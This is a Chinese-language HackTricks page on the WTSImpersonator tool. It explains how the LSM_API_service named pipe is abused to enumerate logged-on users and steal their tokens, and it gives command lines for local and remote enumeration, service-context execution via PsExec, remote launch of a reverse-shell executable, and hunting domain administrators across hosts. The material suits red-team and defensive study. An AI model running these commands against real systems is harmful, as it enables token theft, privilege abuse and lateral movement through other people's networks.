mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
54 lines
2.9 KiB
Markdown
54 lines
2.9 KiB
Markdown
|
<details>
|
|||
|
|
|||
|
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
|||
|
|
|||
|
支持HackTricks的其他方式:
|
|||
|
|
|||
|
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|||
|
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
|||
|
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
|
|||
|
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|||
|
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
|||
|
|
|||
|
</details>
|
|||
|
|
|||
|
**WTS Impersonator**工具利用**"\\pipe\LSM_API_service"** RPC命名管道,隐蔽地枚举已登录用户并劫持其令牌,绕过传统的令牌模拟技术。这种方法有助于在网络中实现无缝的横向移动。这项技术背后的创新归功于**Omri Baso,其作品可在[GitHub](https://github.com/OmriBaso/WTSImpersonator)**上找到。
|
|||
|
|
|||
|
### 核心功能
|
|||
|
该工具通过一系列API调用运行:
|
|||
|
```powershell
|
|||
|
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
|
|||
|
```
|
|||
|
### 关键模块和用法
|
|||
|
- **枚举用户**:使用该工具可以进行本地和远程用户枚举,使用以下命令执行相应场景:
|
|||
|
- 本地:
|
|||
|
```powershell
|
|||
|
.\WTSImpersonator.exe -m enum
|
|||
|
```
|
|||
|
- 远程,通过指定IP地址或主机名:
|
|||
|
```powershell
|
|||
|
.\WTSImpersonator.exe -m enum -s 192.168.40.131
|
|||
|
```
|
|||
|
|
|||
|
- **执行命令**:`exec` 和 `exec-remote` 模块需要**服务**上下文才能运行。本地执行只需 WTSImpersonator 可执行文件和一个命令:
|
|||
|
- 本地命令执行示例:
|
|||
|
```powershell
|
|||
|
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
|
|||
|
```
|
|||
|
- 可使用 PsExec64.exe 获取服务上下文:
|
|||
|
```powershell
|
|||
|
.\PsExec64.exe -accepteula -s cmd.exe
|
|||
|
```
|
|||
|
|
|||
|
- **远程命令执行**:涉及远程创建和安装类似于 PsExec.exe 的服务,允许以适当权限执行。
|
|||
|
- 远程执行示例:
|
|||
|
```powershell
|
|||
|
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
|
|||
|
```
|
|||
|
|
|||
|
- **用户搜索模块**:针对多台机器上的特定用户,以其凭据执行代码。这对于针对在多个系统上具有本地管理员权限的域管理员非常有用。
|
|||
|
- 用法示例:
|
|||
|
```powershell
|
|||
|
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
|
|||
|
```
|